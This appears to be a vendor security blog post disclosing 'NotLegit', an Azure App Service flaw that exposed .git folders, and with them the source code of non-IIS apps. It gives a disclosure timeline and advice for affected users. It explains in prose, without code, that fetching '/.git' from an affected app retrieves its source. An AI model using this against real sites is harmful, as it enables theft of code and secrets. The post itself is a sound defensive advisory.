The Wiz Research Team detected an insecure default behavior in the Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”. The vulnerability, which we dubbed as “NotLegit”, has existed since September 2017 and has probably been exploited in the wild.
Wiz reported this security flaw to Microsoft on October 7th, 2021, and by now it has been mitigated. Small groups of customers are still potentially exposed and should take certain user actions to protect their applications, as detailed in several email alerts Microsoft issued between the 7th - 15th of December, 2021.
The Azure App Service (AKA Azure Web Apps) is a cloud computing-based platform for hosting websites and web applications. The service is easy to use, and therefore, very popular: first, you select the supported programming language and operating system. Then, you deploy your application source code or artifacts on an Azure-managed server using FTP, SSH, or by pulling the source code from a Git service (such as GitHub or private Git repositories). After deployment, the application is accessible for anyone on the internet under their *.azurewebsites.net domain.
Azure supports multiple methods to deploy source code and artifacts to the Azure App service, one of which is using “Local Git”. With “Local Git”, you initiate a local Git repository within the Azure App Service container that enables you to push your code straight to the server.
As a best practice, when you deploy git repositories to webservers and storage buckets, it is always important to ensure that the .git folder is not uploaded as well. Why? Because the .git folder contains the source code, developers' emails, and other sensitive data. However, when the “Local Git” deployment method was used to deploy to the Azure App Service, the git repository was created within the publicly accessible directory (/home/site/wwwroot) that anyone could access. This was a known quirk to Microsoft. To protect your files, Microsoft added a “web.config” file to the .git folder within the public directory that restricted public access. However, only Microsoft's IIS webserver handles "web.config" files. If you use C# or ASP.NET, the application is deployed with IIS and this mitigation is perfectly fine.
But what happens when you use PHP, Ruby, Python, or Node? These programming languages are deployed with different webservers (Apache, Nginx, Flask, etc), which do not handle "web.config" files, leaving them unimpacted by the mitigation and therefore completely vulnerable. Basically, all a malicious actor had to do was to fetch the “/.git” directory from the target application, and retrieve its source code.
Fun fact: Microsoft’s web.config file had a typo (the configuration tag wasn’t closed properly) that made the file unparseable by IIS. Luckily, the error raised by the typo ended up blocking access to the entire directory... So you could say that "web.config" served its propose after all 😊
Later on, Microsoft discovered that users who used other Git deployment tools could also be exposed: If a file was created or modified in the Azure App Service container (using FTP, Web Deploy, or SSH) before any Git deployment, then the service enters an “inplace deployment” state. This state forces any future Git deployment to be initiated within the publicly accessible directory. For more details, refer to Deploying inplace and without repository.
All PHP, Node, Ruby, and Python applications that were deployed using "Local Git” on a clean default application in Azure App Service since September 2017
All PHP, Node, Ruby, and Python applications that were deployed in Azure App Service from September 2017 onward using any Git source, after a file was created or modified in the application container
The only applications that were not impacted by this security flaw are IIS-based applications.
Microsoft emailed different notifications to all impacted users based on their configuration between December 7th-15th, 2021.
An exposed .git folder is a common security issue that users make without even realizing it. Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks like gathering intel on the R&D division, learning the internal infrastructure, and finding software vulnerabilities. Finding vulnerabilities in software is much easier when the source code is available.
Accidentally exposing the Git folder through user error is a security issue that can impact even large organizations— both the United Nations and a number of Indian government sites have been exposed this way in the past, for example. What stands out with NotLegit is that here cloud users did nothing wrong. They did not mistakenly expose their Git folder— the Azure service did! Because the security issue was in an Azure service, cloud users were exposed on a big scale, and without them knowing or having any control over it.
To assess the chance of exposure with the issue we found, we deployed a vulnerable Azure App Service application, linked it to an unused domain, and waited patiently to see if anyone tried to reach the .git files. Within 4 days of deploying, we were not surprised to see multiple requests for the .git folder from unknown actors.
As this exploitation method is extremely easy, common, and is actively being exploited, we encourage all affected users to overview their application’s source code and evaluate the potential risk:
Users who deployed code via FTP or Web Deploy or Bash/SSH which resulted in files getting initialized in the web app before any git deployment.
Users who enabled LocalGit on the web app
Users who subsequent Git clone/push sequence to publish updates
After disclosing the NotLegit vulnerability to Microsoft, Microsoft understood the severity of this issue and took all the necessary steps in order to investigate and mitigate it. MSRC and the Azure App Service team conducted a deep investigation and found the cause of the issue, applied a fix that covers most affected customers, and emailed notifications to warn all customers who are still exposed and await user action (hopefully already taken after the customer notification on December 7th).
Microsoft also granted Wiz a $7,500 bounty for this finding, which we plan to donate.
September 12, 2021 – Wiz Research Team first noticed the insecure behavior.
October 7, 2021 – Issue reported to Microsoft.
October 8, 2021 – Report received by Microsoft.
October 14, 2021 – Microsoft asked for a conference call to discuss and triage the issue.
October 19, 2021 – Conference call with MSRC and the Azure App Services team.
October 22, 2021 - Report acknowledged and Wiz was awarded a $7,500 bounty.
November 17, 2021 - The fix for PHP applications was deployed.
December 07, 2021 - Microsoft started notifying vulnerable customers via email.
Dealing with the need to know every service in depth is hard. So far, in 2021, Azure alone announced 402 new products and features, let alone what was has been announced by AWS and Google Cloud. All told, it is nearly impossible for the average user to keep up. Wiz's research team, a group of cybersecurity veterans who have been in this space for over 10 years, works around the clock to identify potential security issues with CSP services and help our customers identify and address them. Sometimes, we find vulnerabilities in the platform itself. In 2021 alone, we have helped AWS, Azure and Google Cloud fix 14 security vulnerabilities across multiple services.
If you have any questions about our research, please reach out to email@example.com
Special thanks to Sebastian Cornejo (@CuriositySec) who helped us gather azurewebsites.net subdomains for this research.